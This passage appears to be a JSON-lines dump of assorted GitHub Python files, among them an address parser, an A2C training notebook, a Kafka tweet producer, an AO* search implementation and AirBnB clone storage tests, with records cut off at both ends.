self.History.clear()\r\n","repo_name":"vaylonn/azure-gpt","sub_path":"AzureOpenAIRequest.py","file_name":"AzureOpenAIRequest.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11653823817","text":"# Python program to combine two dictionary adding values for common keys\n\ndict_1 = {'x': 10, 'y': 25, 'z': 12, 'u': 18}\ndict_2 = {'x': 30, 'y': 17, 'z': 51, 't': 8}\ndict_3 = {}\n\ndict_1_keys = dict_1.keys()\ndict_2_keys = dict_2.keys()\n\nfor key_1 in dict_1_keys:\n for key_2 in dict_2_keys:\n if key_1 == key_2:\n dict_3[key_1] = dict_1[key_1] + dict_2[key_2]\n\n\nprint(dict_3)","repo_name":"bawa-yatin/Python-Training","sub_path":"First Week Practice Questions/Directory Questions/Q.4.py","file_name":"Q.4.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34282496561","text":"# Uses python3\n# math from https://stackoverflow.com/questions/54608210/different-summands-problem-greedy-alogrithm\nimport sys\nfrom math import floor, sqrt\n\ndef optimal_summands(n):\n summands = []\n #write your code here\n summands_count = floor((sqrt(8 * n + 1)-1) / 2)\n summands = [i for i in range(1, summands_count)]\n last_summand = int(n - summands_count * (summands_count - 1) / 2)\n\n summands.append(last_summand)\n\n return summands\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n summands = optimal_summands(n)\n print(len(summands))\n for x in summands:\n print(x, end=' ')\n","repo_name":"maris-svirksts/Data-Structures-and-Algorithms-Specialization","sub_path":"Algorithmic Toolbox/Week-3/6_maximum_number_of_prizes/different_summands.py","file_name":"different_summands.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30717200060","text":"from argparse import ArgumentParser\nimport re\nimport sys\n\nclass Address:\n \"\"\"\n This class creates an address object and has methods to use on those objects.\n \n Attributes:\n address (str): The full address of the home\n house_number (str): the house's number\n street (str): The street the house is on\n city (str): The city the house is in\n state(str): The state the house is in\n zip(str): The zip code of the home\n \n Methods:\n __repr__(): A function that returns a formal representation of the Address object\n \"\"\"\n \n def __init__(self, address):\n \"\"\"\n Create an instance of the Address class\n\n Args:\n address (string): The full address of the location\n \n Side effects:\n Creates an address object with multiple attributes and creates a regex pattern\n \n Raises:\n ValueError if the pattern does not match the address\n \"\"\"\n patt = re.compile(r\"\"\"\n (?x)\n ^(?P\\S+)\n \\s\n (?P[^,]+)\n ,\\s\n (?P.*)\n \\s\n (?P[A-Z]{2})\n \\s\n (?P\\d{5})\"\"\"\n )\n match = patt.search(address)\n if match == None:\n raise ValueError(\"The address string could not be parsed.\")\n else:\n self.address = match.group(0)\n self.house_number = match.group(\"house_number\")\n self.street = match.group(\"street\")\n self.city = match.group(\"city\")\n self.state = match.group(\"state\")\n self.zip = match.group(\"zip\") \n\n def __repr__(self):\n \"\"\"Return a formal representation of the Address object.\"\"\"\n return (\n f\"address: {self.address}\\n\"\n f\"house number: {self.house_number}\\n\"\n f\"street: {self.street}\\n\"\n f\"city: {self.city}\\n\"\n f\"state: {self.state}\\n\"\n f\"zip: {self.zip}\"\n )\n\ndef read_addresses(filepath):\n \"\"\"A function that reads the addresses and converts them into a new list of Address objects\n\n Args:\n filepath (string): Path to the file that contains all of the addresses\n\n Returns:\n list: A list of the addresses in the form of address objects\n \"\"\"\n with open(filepath, 'r', encoding=\"utf-8\") as adds:\n alladd = []\n for line in adds:\n line = line.strip()\n addy = Address(line)\n alladd.append(addy)\n return alladd\n \n\ndef parse_args(arglist):\n \"\"\" Parse command-line arguments.\n \n Expect one mandatory argument, the path to a file of addresses.\n \n Args:\n arglist (list of str): command-line arguments.\n \n Returns:\n namespace: an object with one attribute, file, containing a string.\n \"\"\"\n parser = ArgumentParser()\n parser.add_argument(\"file\", help=\"file containing one address per line\")\n return parser.parse_args(arglist)\n\n\nif __name__ == \"__main__\":\n args = parse_args(sys.argv[1:])\n for address in read_addresses(args.file):\n # the !r tells the f-string to use the __repr__() method to generate\n # a string version of the address object\n print(f\"{address!r}\\n\")\n","repo_name":"khrathore/rathore-khushboo-inst326","sub_path":"parse_addresses.py","file_name":"parse_addresses.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"86643296154","text":"# ---\n# jupyter:\n# jupytext:\n# formats: py:percent,ipynb\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.4.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %% [markdown]\n# # 5 Review of a Minimal, SB3-compatible Environment `rampup-v1` with A2C\n\n# %%\nimport os\nimport subprocess\nimport numpy as np\nimport webbrowser\nimport gym\nfrom gym import spaces\nfrom stable_baselines3 import A2C, PPO\nfrom stable_baselines3.common.cmd_util import make_vec_env\nfrom stable_baselines3.common.callbacks import EvalCallback\nfrom stable_baselines3.common.evaluation import evaluate_policy\n\nfrom plan_opt.demand import Demand\nfrom plan_opt.demand_small_samples import four_weeks_uprising\nfrom plan_opt.envs.rampup1 import RampupEnv1\n\n# %% [markdown]\n# ### Preparation\n#\n# Demand is created deterministically from a hand-crafted blueprint of just four weeks of data for a fleet of size 1.\n# The action space is descrete, only categorical changes of equipment are allowed.\n\n# %%\ndemand = Demand(period=len(four_weeks_uprising), data=four_weeks_uprising)\ndemand.show(only_data=True)\n\n# %% [markdown]\n# Altough the environment is registered with Gym as 'rampup-v1', it is imported straight from the module here. See notebook 05 using the registration with Gym.\n\n# %%\nenv = RampupEnv1(demand)\n\n# %%\nalgorithm = \"A2C\"\ntimesteps = 20000\ntensorboard_log = \"logs/rampup_tensorboard/\"\ntb_log_suffix = f\"{str(timesteps)[:-3]}k\"\nprint(f\"Tensorboard logs saved with suffix {tb_log_suffix}\")\n\n# %% [markdown]\n# ### Train the model\n\n# %%\n# %%time\ndeterministic = False\nmodel = A2C(\"MlpPolicy\", env, tensorboard_log=tensorboard_log, verbose=1)\nmodel.learn(\n total_timesteps=timesteps,\n eval_freq=100,\n tb_log_name=f\"A2C_train_run_{tb_log_suffix}\",\n)\n\n# %% [markdown]\n# ### Simple Evaluation\n\n# %%\nenv.fill_table = True\nobs = env._set_initial_state(initial_state_status=3)\nwhile not env.done:\n action, _states = model.predict(obs, deterministic=deterministic)\n obs, reward, done, info = env.step(action)\nenv.render()\nenv.episode_table\n\n# %% [markdown]\n# ## Evaluation\n\n# %%\n# Separate evaluation env\n# eval_env = RampupEnv1(demand)\neval_env = env\n# Use deterministic actions for evaluation (that seems like #bs)\neval_callback = EvalCallback(\n eval_env,\n best_model_save_path=\"./logs/\",\n log_path=\"./logs/\",\n eval_freq=100,\n deterministic=deterministic,\n render=False,\n)\n\neval_model = A2C(\"MlpPolicy\", eval_env, tensorboard_log=tensorboard_log, verbose=1)\neval_model.learn(\n total_timesteps=timesteps,\n callback=eval_callback,\n tb_log_name=f\"A2C_eval_run_{tb_log_suffix}\",\n)\n\n# %%\neval_env.fill_table = True\nobs = eval_env._set_initial_state(initial_state_status=3)\nwhile not eval_env.done:\n action, _states = eval_model.predict(obs, deterministic=True)\n obs, reward, done, info = eval_env.step(action)\neval_env.render()\neval_env.episode_table\n\n# %%\nmean_reward, std_reward = evaluate_policy(eval_model, eval_env)\nprint(\n f\"Policy evaluated for 10 episodes with a mean reward of {int(mean_reward)} and a standard deviation of {int(std_reward)}.\"\n)\n\n# %% [markdown]\n# ### Tensorboard\n# Start Tensorboard on port 6006 and open it in a browser.\n\n# %%\nif 1 == 0:\n pid = subprocess.Popen(\n [\"tensorboard\", \"--logdir\", f\"./{tensorboard_log}\", \"--port\", \"6006\"]\n )\n os.system(\"sleep 5\")\n webbrowser.open(\"http://localhost:6006\")\n\n# %%\n# Alternatively, load the TensorBoard notebook extension\n# # %load_ext tensorboard\n# # %tensorboard --logdir ./rampup_tensorboard/\n\n# %% [markdown]\n# To wrap up, kill the Tensorboard process.\n\n# %%\nif 1 == 0:\n os.system(\"kill -9 $(lsof -t -i:6006)\")\n\n# %%\n","repo_name":"sebas-seck/plan-opt","sub_path":"nb_05_alg_minimal_rampup-v1.py","file_name":"nb_05_alg_minimal_rampup-v1.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27991304701","text":"from django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom django.shortcuts import render\n\nfrom mywebsite.models import Question\n\n\ndef index(request):\n page = request.GET.get(\"page\", 1)\n kw = request.GET.get(\"kw\", '')\n question_list = Question.objects.order_by('create_date')\n if kw:\n question_list = question_list.filter(\n Q(subject__icontains=kw) |\n Q(content__icontains=kw) |\n Q(answer__content__icontains=kw) |\n Q(author__username__icontains=kw) |\n Q(answer__author__username__icontains=kw)\n ).distinct()\n paginator = Paginator(question_list, 15)\n page_obj = paginator.get_page(page)\n context = {'question_list': page_obj}\n return render(request, 'mywebsite/question_list.html', context)\n\n\ndef detail(request, question_id):\n if request.method == \"POST\":\n pass\n else:\n question = Question.objects.get(id=question_id)\n return render(request, 'mywebsite/question_detail.html', {'question': question})\n","repo_name":"gmyun1999/django_practice","sub_path":"mywebsite/views/base_views.py","file_name":"base_views.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36834838411","text":"import pickle\nimport os\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\n\nemotions = {\n \"01\": \"neutral\",\n \"02\": \"calm\",\n \"03\": \"happy\",\n \"04\": \"sad\",\n \"05\": \"angry\",\n \"06\": \"fearful\",\n \"07\": \"disgust\",\n \"08\": \"surprised\"\n}\n\nemotion_dict = {\n \"neutral\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"calm\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"happy\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"sad\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"angry\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"fearful\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"disgust\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"surprised\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n }\n}\n\npath = os.path.dirname(os.getcwd())\n\n\ndef create_confusion_matrix():\n\n itr = 0\n\n pklfile = path + '/Emotion_Voice_Detection_Model_dataset.pkl'\n with open(pklfile, 'rb') as file:\n Emotion_Voice_Detection_Model = pickle.load(file)\n\n pklfile = path + \"/final_x_train.pkl\"\n with open(pklfile, 'rb') as file:\n x_values = pickle.load(file)\n\n pklfile = path + \"/final_x_test.pkl\"\n with open(pklfile, 'rb') as file:\n x_test = pickle.load(file)\n\n pklfile = path + \"/final_y_test.pkl\"\n with open(pklfile, 'rb') as file:\n y = pickle.load(file)\n\n scaler = MinMaxScaler()\n x_new = scaler.fit(x_values)\n\n for i in range(len(x_test)):\n\n emotion = y[i]\n\n feature = [x_test[i]]\n feature = np.array(feature)\n feature = scaler.transform(feature)\n\n pred_emotion = Emotion_Voice_Detection_Model.predict(feature)[0]\n\n emotion_dict[emotion][pred_emotion] = emotion_dict[emotion][pred_emotion] + 1\n\n if itr == 100:\n print(emotion_dict)\n itr = itr + 1\n\n print(emotion_dict)\n","repo_name":"sid056/SER-project","sub_path":"prediction/confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37940237506","text":"import pprint\nimport sqlite3\nimport json\nimport time\nfrom kafka import KafkaProducer\nimport os\n\ndef json_serializer(data):\n \"\"\"Returns a JSON serialized dump of the given data.\"\"\"\n\n return json.dumps(data).encode(\"utf-8\")\n\n\n\nif __name__ == \"__main__\":\n batch_size, timeout = 100, 1\n\n print(\"-----Tweet Data Producer Stream-----\")\n\n producer = KafkaProducer(\n bootstrap_servers=[\"localhost:9092\"],\n value_serializer=json_serializer\n )\n\n print(\"Kafka Producer started.\")\n\n try:\n #categories = [\"Gaming\", \"Oil\", \"EVs\", \"Tech\"]\n table_names = [\"reduced_tweet_counts\"]\n\n #for category in categories:\n for table in table_names:\n #connection = sqlite3.connect(os.path.join(os.path.dirname(__file__),f\"../Database/fypdb-{category}.sqlite\"))\n connection = sqlite3.connect(os.path.join(os.path.dirname(__file__),f\"../Database/fypdb-Pharma.sqlite\"))\n #print(f\"Connected to FYPDB-{category} Database.\")\n print(f\"Connected to FYPDB Database.\")\n cursor = connection.cursor()\n query = f\"SELECT * FROM {table}\"\n cursor.execute(query)\n\n\n records = cursor.fetchall()\n \n for record in records:\n data = dict()\n data['category'] = record[0]\n #data['ticker'] = record[1]\n data['tweetDate'] = record[1]\n data['count'] = record[2]\n data['tweet'] = record[3]\n \n \n producer.send('tweets-pharma-topic', json.dumps(data)) #topic: tweets-topic\n pprint.pprint(json.dumps(data))\n\n\n time.sleep(10) #Sleep before producing the next category of Tweets \n\n cursor.close()\n connection.close() \n\n \n except sqlite3.Error as error:\n #print(f\"Failed to connect to FYPDB-{category} Database.\")\n print(f\"Failed to connect to FYPDB Database.\")\n exit(0)\n\n \n finally:\n if connection:\n connection.close()\n #print(f\"Disconnected from FYPDB-{category} Database.\")\n print(f\"Disconnected from FYPDB Database.\")\n exit(0)\n","repo_name":"svishakan/Social-Media-Based-Stock-Market-Analysis","sub_path":"Kafka/TweetProducer2.py","file_name":"TweetProducer2.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24825096775","text":"from PIL import Image, ImageDraw, ImageFilter, ImageEnhance\nimport matplotlib.pyplot as plt\nimport math\n\n\nmapName = 'map1'\n\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------\n\nfilepath = './maps/'+mapName+'.map'\nlines = []\n\nwith open(filepath) as fp:\n\n recordinglines = False\n line = fp.readline()\n cnt = 1\n\n while line:\n\n print(\"Reading Line {}: {}\".format(cnt, line.strip()))\n line = fp.readline()\n cnt += 1\n\n if recordinglines:\n if line.strip() != \"DATA\":\n lines.append(line.strip())\n\n if line.strip() == \"LINES\":\n recordinglines = True\n\nlines.remove('')\nprint(\"Number of Lines: {}\".format(len(lines)))\n\n\nformattedLines = []\n\nfor line in lines:\n linedata = line.split()\n formattedLines.append({'p1': [int(linedata[0]), int(linedata[1])], 'p2':[int(linedata[2]), int(linedata[3])]})\n\n\n\n\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------\n\ngrid = []\ngridcellsize = 100\noriginPoint = []\nnumberOfCellsBuffer = 0\n\nminX = 0\nminY = 0\nmaxX = 0\nmaxY = 0\n\nfor line in formattedLines:\n p1x = line['p1'][0]\n p1y = line['p1'][1]\n p2x = line['p2'][0]\n p2y = line['p2'][1]\n\n if p1x < minX:\n minX = p1x\n if p1y < minY:\n minY = p1y\n\n if p2x < minX:\n minX = p2x\n if p2y < minY:\n minY = p2y\n\n if p1x > maxX:\n maxX = p1x\n if p1y > maxY:\n maxY = p1y\n\n if p2x > maxX:\n maxX = p2x\n if p2y > maxY:\n maxY = p2y\n\nprint(\"minX {} minY {} maxX {} maxY {}\".format(minX, minY, maxX, maxY))\n\nprint(originPoint)\n\nlengthX = maxX - minX\nlengthY = maxY - minY\n\nprint(lengthX)\nprint(lengthY)\n\n\n\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------\nimg_small = Image.new('RGB', (int(lengthX / gridcellsize) + 1, int(lengthY / gridcellsize)+1), (255, 255, 255))\nxadj = abs(minX)\nyadj = abs(minY)\n\nfor line in formattedLines:\n draw = ImageDraw.Draw(img_small)\n draw.line((int((line['p1'][0] + xadj)/gridcellsize), int((line['p1'][1] + yadj)/gridcellsize), int((line['p2'][0] + xadj)/gridcellsize), int((line['p2'][1] + yadj))/gridcellsize), fill=0)\n del draw\n\n\n#img_filtered = img_small.filter(ImageFilter.BoxBlur(3))\nimg_filtered = img_small.filter(ImageFilter.GaussianBlur(3))\n\nenhancer = ImageEnhance.Contrast(img_filtered)\nimg_filtered = enhancer.enhance(2.0)\n\n\n\n#img_filtered = img_small.filter(ImageFilter.SMOOTH)\nimg_combined = Image.new('RGB', (int(lengthX / gridcellsize) + 1, int(lengthY / gridcellsize)+1), (255, 255, 255))\n\n\npixel_small = img_small.load()\npixel_filtered = img_filtered.load()\npixel_combined = img_combined.load()\n\nwidth, height = img_small.size\nfor y in range(height):\n for x in range(width):\n if pixel_small[x, y] == (0, 0, 0):\n pixel_combined[x, y] = (0,0,0)\n if pixel_small[x, y] == (255, 255, 255):\n pixel_combined[x, y] = pixel_filtered[x, y]\n\n\n\n#img_small.show()\n#img_filtered.show()\nimg_combined.show()\n\n\nrotated_img = img_combined.transpose(Image.FLIP_TOP_BOTTOM)\n\nrotated_img.show()\nrotated_img.save(mapName+\".png\")","repo_name":"Sam-Fuller/Advanced-Mobile-Robotics-Assessment-2","sub_path":"pythonCode/ocm.py","file_name":"ocm.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41892866931","text":"\"\"\"Model testing module.\n\nFile: test.py\nAuthor: Jiří Čechák\nDate: 12.04.2018\nPython Version: 3.6.3\n\nIn this module is function for testing the selected trained model on testing data using BLEU metric.\n\"\"\"\n\nfrom __future__ import print_function\nfrom time import time\n\nfrom utils import printErrorAndExit, timestampToTime\nimport constants as c\nfrom dataUtils import loadVocabulary, getFileWithLastSavedWeights, loadTestingDataAndTokenize, tokenizedInputToIds\nfrom model import createModel, testBLEU\n\n\ndef test(modelNumber, dataLimit):\n \"\"\"Testing on testing data using BLEU metrick.\n\n Args:\n modelNumber: number of a model to test\n dataLimit: limit for testing data\n \"\"\"\n\n print(\"Testing\")\n\n savedWeightsFile, _, _ = getFileWithLastSavedWeights(modelNumber, None)\n\n if savedWeightsFile == None:\n printErrorAndExit(c.ERROR_WEIGHTS_FILE_NOT_FOUND)\n\n vocabulary, wordToIndexVocabulary = loadVocabulary()\n\n encTokens, decTokens = loadTestingDataAndTokenize(\n c.TEST_CONTEXT_FILEPATH, c.TEST_UTTERANCE_FILEPATH, dataLimit, wordToIndexVocabulary)\n\n if len(encTokens) < c.MIN_TEST_DATA_SIZE:\n printErrorAndExit(c.ERROR_MIN_TEST_DATA_SIZE)\n\n encTokensIds = []\n\n for tokens in encTokens:\n encTokensIds.append(tokenizedInputToIds(tokens, wordToIndexVocabulary)[0])\n\n model = createModel(modelNumber, vocabulary, None, savedWeightsFile)\n\n print(\"\")\n\n timeStart = time()\n\n bleuTestScore = testBLEU(encTokensIds, decTokens, model, vocabulary, text=\"Testing on testing data\")\n\n print(\"BLEU testing score: {}\".format(bleuTestScore))\n\n testDataFilepath = c.MODEL1_TESTDATA_FILEPATH if modelNumber == 1 else c.MODEL2_TESTDATA_FILEPATH if modelNumber == 2 else c.MODEL3_TESTDATA_FILEPATH\n\n try:\n testDataFile = open(testDataFilepath, \"w\")\n testDataFile.write(\"{}\\n\".format(bleuTestScore))\n testDataFile.close()\n except Exception as e:\n print(e)\n \n timeEnd = time()\n timeTotal = timeEnd - timeStart\n \n print(\"\\nTOTAL TIME: {}\".format(timestampToTime(timeTotal)))","repo_name":"jirkacechak/chatbot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25282135667","text":"class Graph:\n def __init__(self, startNode, graph, heuristicNodeList):\n self.start=startNode\n self.graph=graph\n self.h=heuristicNodeList\n self.parent={}\n self.solutionGraph={}\n self.status={}\n\n def getNeighbors(self,v):\n return self.graph.get(v,'')\n \n def getStatus(self,v):\n return self.status.get(v,0)\n \n def setStatus(self,v,value):\n self.status[v]=value\n\n def applyAOstar(self):\n self.aoStar(self.start,False)\n\n def printSolution(self):\n print(\"traverse the graph from start node:\",self.start)\n print(\"--------------------\")\n print(self.solutionGraph)\n print(\"----------------------------------\")\n\n def getHeuristicNodeValue(self,v):\n return self.h.get(v,0)\n \n def setHeuristicNodeValue(self,v,value):\n self.h[v]=value\n\n def computeMinimumCostChildNodes(self, v):\n minimumCost=0\n costToChildNodeListDict={}\n costToChildNodeListDict[minimumCost]=[]\n flag=True #determine if its processing the first set of child nodes.\n for nodeInfoTupleList in self.getNeighbors(v):\n cost=0\n nodeList=[]\n for n, weight in nodeInfoTupleList:\n cost=cost+self.getHeuristicNodeValue(n)+weight\n nodeList.append(n)\n if flag==True:\n minimumCost=cost\n flag=False\n costToChildNodeListDict[minimumCost]=nodeList\n else:\n if minimumCost>cost:\n minimumCost=cost\n costToChildNodeListDict[minimumCost]=nodeList\n return minimumCost, costToChildNodeListDict[minimumCost]\n\n def aoStar(self, v, backTracking):\n print(\"heuristic values: \",self.h)\n print(\"solution graph: \",self.solutionGraph)\n print(\"currently processing node: \",v)\n print(\"------------------------------\")\n if self.getStatus(v)>=0: #unexplored node\n min, nodeList = self.computeMinimumCostChildNodes(v)\n print(min,nodeList)\n self.setHeuristicNodeValue(v,min)\n self.setStatus(v,len(nodeList))\n solution=True\n for n in nodeList:\n self.parent[n]=v\n if self.getStatus(n)!=-1:\n solution=False\n if solution==True:\n self.setStatus(v,-1)\n self.solutionGraph[v]=nodeList\n if v!=self.start:\n self.aoStar(self.parent[v],True)\n if backTracking==False:\n for node in nodeList:\n self.setStatus(node,0)\n self.aoStar(node,False)\n\nprint(\"Graph 1\")\nh = {'A':1,'B':6,'C':2,'D':12,'E':2,'F':1,'G':5,'H':7,'I':7,'J':1} \ngraph1= {\n 'A':[[('B',1),('C',1)],[('D',1)]],\n 'B':[[('G',1)],[('H',1)]],\n 'C': [[('J', 1)]],\n 'D': [[('E', 1), ('F', 1)]],\n 'G': [[('I', 1)]]\n} \ng1=Graph('A',graph1,h) \ng1.applyAOstar()\ng1.printSolution()","repo_name":"ShiviDev/aimlLab","sub_path":"aostar.py","file_name":"aostar.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71467655845","text":"#!/usr/bin/python3\n\"\"\"\nUnit Test for DataBase Storage Class\n\"\"\"\nimport unittest\nfrom datetime import datetime\nimport models\nimport json\nimport os\nimport inspect\nfrom models.base_model import BaseModel\nfrom models.amenity import Amenity\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\nfrom models.state import State\nfrom models.user import User\n\nstorage = models.storage\nenviron = os.environ\nif environ.get('HBNB_TYPE_STORAGE') == 'db':\n DBStorage = models.db_storage.DBStorage\n\n\n@unittest.skipIf(environ.get('HBNB_TYPE_STORAGE') != 'db',\n \"DB Storage doesn't use FileStorage\")\nclass TestDBStorageDocs(unittest.TestCase):\n \"\"\"Class for testing DB Storage docs\"\"\"\n\n if environ.get('HBNB_TYPE_STORAGE') == 'db':\n all_funcs = inspect.getmembers(DBStorage, inspect.isfunction)\n\n @classmethod\n def setUpClass(cls):\n \"\"\"sets up the class for this round of tests\"\"\"\n print('\\n\\n.................................')\n print('..... Testing Documentation .....')\n print('...... For DBStorage Class ......')\n print('.................................\\n\\n')\n\n def test_doc_file(self):\n \"\"\"... documentation for the file\"\"\"\n actual = models.db_storage.__doc__\n self.assertIsNotNone(actual)\n\n def test_doc_class(self):\n \"\"\"... documentation for the class\"\"\"\n actual = DBStorage.__doc__\n self.assertIsNotNone(actual)\n\n def test_all_function_docs(self):\n \"\"\"... tests for ALL DOCS for all functions in db_storage file\"\"\"\n AF = TestDBStorageDocs.all_funcs\n for f in AF:\n self.assertIsNotNone(f[1].__doc__)\n\n\n@unittest.skipIf(environ.get('HBNB_TYPE_STORAGE') != 'db',\n \"DB Storage doesn't use FileStorage\")\nclass TestTracebackNullError(unittest.TestCase):\n \"\"\"testing for throwing Traceback erros:\n missing attributes that Cannot be NULL\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"sets up the class for this round of tests\"\"\"\n print('\\n\\n....................................')\n print('.......... Testing DBStorage .......')\n print('...... Trying to Throw Errors ......')\n print('....................................\\n\\n')\n\n def tearDown(self):\n \"\"\"tidies up tests that throw errors\"\"\"\n storage.rollback_session()\n\n def test_state_no_name(self):\n \"\"\"... checks to create a state with no name\"\"\"\n with self.assertRaises(Exception) as context:\n s = State()\n s.save()\n self.assertTrue('\"Column \\'name\\' cannot be null\"'\n in str(context.exception))\n\n def test_city_no_state(self):\n \"\"\"... checks to create a city with invalid state\"\"\"\n with self.assertRaises(Exception) as context:\n c = City(name=\"Tapioca\", state_id=\"NOT VALID\")\n c.save()\n self.assertTrue('a child row: a foreign key constraint fails'\n in str(context.exception))\n\n def test_place_no_user(self):\n \"\"\"... checks to create a place with no city\"\"\"\n with self.assertRaises(Exception) as context:\n p = Place()\n p.save()\n self.assertTrue('\"Column \\'city_id\\' cannot be null\"'\n in str(context.exception))\n\n def test_review_no_text(self):\n \"\"\"... checks to create a Review with no text\"\"\"\n with self.assertRaises(Exception) as context:\n r = Review()\n r.save()\n self.assertTrue('\"Column \\'text\\' cannot be null\"'\n in str(context.exception))\n\n def test_amenity_no_name(self):\n \"\"\"... checks to create an amenity with no name\"\"\"\n with self.assertRaises(Exception) as context:\n a = Amenity()\n a.save()\n self.assertTrue('\"Column \\'name\\' cannot be null\"'\n in str(context.exception))\n\n def test_user_no_name(self):\n \"\"\"... checks to create a user with no email\"\"\"\n with self.assertRaises(Exception) as context:\n u = User()\n u.save()\n self.assertTrue('\"Column \\'email\\' cannot be null\"'\n in str(context.exception))\n\n\n@unittest.skipIf(environ.get('HBNB_TYPE_STORAGE') != 'db',\n \"DB Storage doesn't use FileStorage\")\nclass TestAllInstances(unittest.TestCase):\n \"\"\"testing for Various State Class instances & methods\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"sets up the class for this round of tests\"\"\"\n print('\\n\\n....................................')\n print('.......... Testing DBStorage .......')\n print('. State, City, User, Place Amenity .')\n print('....................................')\n storage.delete_all()\n cls.s = State(name=\"California\")\n cls.c = City(state_id=cls.s.id,\n name=\"San Francisco\")\n cls.u = User(email=\"betty@holbertonschool.com\",\n password=\"pwd\")\n cls.p1 = Place(user_id=cls.u.id,\n city_id=cls.c.id,\n name=\"a house\")\n cls.p2 = Place(user_id=cls.u.id,\n city_id=cls.c.id,\n name=\"a house two\")\n cls.a1 = Amenity(name=\"Wifi\")\n cls.a2 = Amenity(name=\"Cable\")\n cls.a3 = Amenity(name=\"Bucket Shower\")\n objs = [cls.s, cls.c, cls.u, cls.p1, cls.p2, cls.a1, cls.a2, cls.a3]\n for obj in objs:\n obj.save()\n\n def setUp(self):\n \"\"\"initializes new user for testing\"\"\"\n self.s = TestAllInstances.s\n self.c = TestAllInstances.c\n self.u = TestAllInstances.u\n self.p1 = TestAllInstances.p1\n self.p2 = TestAllInstances.p2\n self.a1 = TestAllInstances.a1\n self.a2 = TestAllInstances.a2\n self.a3 = TestAllInstances.a3\n\n def test_all_reload_save(self):\n \"\"\"... checks if all(), save(), and reload function\n in new instance. This also tests for reload\"\"\"\n actual = 0\n db_objs = storage.all()\n for obj in db_objs.values():\n for x in [self.s.id, self.c.id, self.u.id, self.p1.id]:\n if x == obj.id:\n actual += 1\n self.assertTrue(actual == 4)\n\n def test_new(self):\n \"\"\"... checks if new() function returns newly created instance\"\"\"\n actual = False\n self.s_new = State(name=\"Illinois\")\n self.s_new.save()\n db_objs = storage.all()\n for obj in db_objs.values():\n if obj.id == self.s_new.id:\n actual = True\n self.assertTrue(actual)\n\n def test_delete(self):\n \"\"\"... checks if all(), save(), and reload function\n in new instance. This also tests for reload\"\"\"\n actual = True\n check_cls = type(self.s).__name__\n check = self.s.name\n self.s.delete()\n storage.save()\n db_objs = storage.all()\n for obj in db_objs.values():\n if type(obj).__name__ == check_cls and obj.name == check:\n actual = False\n self.assertTrue(True)\n\nif __name__ == '__main__':\n unittest.main\n storage.delete_all()\n","repo_name":"KatyaKalache/AirBnB_clone_v2","sub_path":"tests/test_models/test_engine/test_db_storage.py","file_name":"test_db_storage.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28829395715","text":"from 